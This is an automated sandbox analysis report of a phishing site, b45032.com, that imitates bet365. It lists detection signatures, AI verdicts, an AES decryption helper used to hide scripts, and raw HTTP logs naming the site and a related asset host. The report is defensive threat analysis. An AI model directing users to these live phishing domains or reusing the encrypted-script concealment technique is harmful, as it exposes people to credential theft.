Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://b45032.com/

Overview

General Information

Sample URL:https://b45032.com/
Analysis ID:1589661
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML title does not match URL
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,16585267306971853294,6447281845026543591,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://b45032.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://b45032.com/Avira URL Cloud: detection malicious, Label: phishing
Source: https://b45032.com/images_plus/other/en/right3.jpgAvira URL Cloud: Label: phishing
Source: https://b45032.com/gdcode_1736725694Avira URL Cloud: Label: phishing
Source: https://b45032.com/common/storage/cms/cms_1045.png?v=1611754636Avira URL Cloud: Label: phishing
Source: https://b45032.com/images_plus/other/en/right2.jpgAvira URL Cloud: Label: phishing
Source: https://b45032.com/getcatlist/224Avira URL Cloud: Label: phishing
Source: https://b45032.com/getegame?platform%5B%5D=202&page=1&gamename=&gameid=Avira URL Cloud: Label: phishing
Source: https://b45032.com/getegame?platform%5B%5D=224&page=1&gamename=&gameid=Avira URL Cloud: Label: phishing

Phishing

barindex
Source: https://b45032.com/#Joe Sandbox AI: Score: 9 Reasons: The brand 'bet365' is a well-known online gambling company., The legitimate domain for bet365 is 'bet365.com'., The provided URL 'b45032.com' does not match the legitimate domain name., The URL 'b45032.com' contains numbers and does not resemble the brand name, which is a common tactic in phishing., There is no clear association between the URL and the brand 'bet365'. DOM: 2.0.pages.csv
Source: https://b45032.com/#Joe Sandbox AI: Score: 9 Reasons: The brand 'bet365' is a well-known online gambling company., The legitimate domain for bet365 is 'bet365.com'., The provided URL 'b45032.com' does not match the legitimate domain name., The URL 'b45032.com' contains numbers and does not resemble the brand name, which is a common tactic in phishing., There is no clear association between the URL and the brand 'bet365'. DOM: 2.1.pages.csv
Source: https://b45032.com/egame/224Joe Sandbox AI: Score: 9 Reasons: The brand 'bet365' is a well-known online gambling company., The legitimate domain for bet365 is 'bet365.com'., The provided URL 'b45032.com' does not match the legitimate domain name., The URL 'b45032.com' contains numbers and does not resemble the brand name, which is suspicious., There is no clear association between the URL and the brand 'bet365'. DOM: 3.4.pages.csv
Source: https://b45032.com/egame/224Joe Sandbox AI: Score: 9 Reasons: The brand 'bet365' is a well-known online gambling company., The legitimate domain for bet365 is 'bet365.com'., The provided URL 'b45032.com' does not match the legitimate domain name., The URL 'b45032.com' contains numbers and does not resemble the brand name, which is a common tactic in phishing., There is no clear association between the URL and the brand 'bet365'. DOM: 3.6.pages.csv
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://b45032.com/... The provided JavaScript snippet appears to be a malicious script that attempts to decrypt and execute encrypted code. The use of the `cryptoJsAesDecrypt` function, which is likely a custom decryption function, along with the large amount of obfuscated data being decrypted, indicates a high risk of malicious behavior. This script demonstrates behaviors associated with dynamic code execution, data exfiltration, and the use of suspicious domains, all of which are considered high-risk indicators according to the provided scoring matrix.
Source: 0.73.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://b45032.com/egame/224... The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It contains several high-risk indicators, including dynamic code execution via the `cryptoJsAesDecrypt` function, which could be used to execute remote or obfuscated code. Additionally, the script appears to be sending sensitive data (potentially including user credentials or other personal information) to an unknown external domain, which is a clear indicator of data exfiltration. The heavy obfuscation of the code and the use of multiple fallback domains further contribute to the high-risk assessment. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: https://b45032.com/#HTTP Parser: Title: bet365 does not match URL
Source: https://b45032.com/egame/224HTTP Parser: Title: bet365 does not match URL
Source: https://b45032.com/egame/202HTTP Parser: Title: bet365 does not match URL
Source: https://b45032.com/js/www/decrypt.jsHTTP Parser: function cryptojsaesdecrypt(encrypted, pass) { var key = cryptojs.sha256(pass); var ivandciphertext = cryptojs.enc.base64.parse(encrypted); var iv = cryptojs.lib.wordarray.create(ivandciphertext.words.slice(0, 4)); var ciphertext = cryptojs.lib.wordarray.create(ivandciphertext.words.slice(4)); var decrypted = cryptojs.aes.decrypt({ ciphertext: ciphertext }, key, { iv: iv, padding: cryptojs.pad.pkcs7, mode: cryptojs.mode.cbc }); return decrypted.tostring(cryptojs.enc.utf8);}
Source: https://b45032.com/#HTTP Parser: <input type="password" .../> found
Source: https://b45032.com/egame/224HTTP Parser: <input type="password" .../> found
Source: https://b45032.com/egame/202HTTP Parser: <input type="password" .../> found
Source: https://b45032.com/#HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="author".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/#HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/224HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="copyright".. found
Source: https://b45032.com/egame/202HTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.34
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.34
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/crypto-js.min.js HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /js/www/decrypt.js HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /plus/js/unite/crypto-js.min.js HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /js/www/decrypt.js HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /plus/plugin/css/to_bootstrap.css?ver=1606790105 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/bootstrap.min.js?ver=1606790105 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D
Source: global trafficHTTP traffic detected: GET /plus/plugin/css/sweetalert.css?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/css/font-awesome.min.css?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/common/bet365_style.css?ver=1684314915 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/css/jquery-ui.min.css?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/css/swiper.min.css?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/common/index.css?ver=1700473959 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/unite/prizedraw_pop_unite.css?ver=1733883988 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/custom/prizedraw_pop_custom.css?ver=1663905027 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/unite/float_unite.css?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/custom/float_customer.css?ver=1606988918 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/unite/login_modal_unite.css?ver=1726133380 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/custom/login_modal_custom.css?ver=1726649910 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/plugin/js/bootstrap.min.js?ver=1606790105 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; 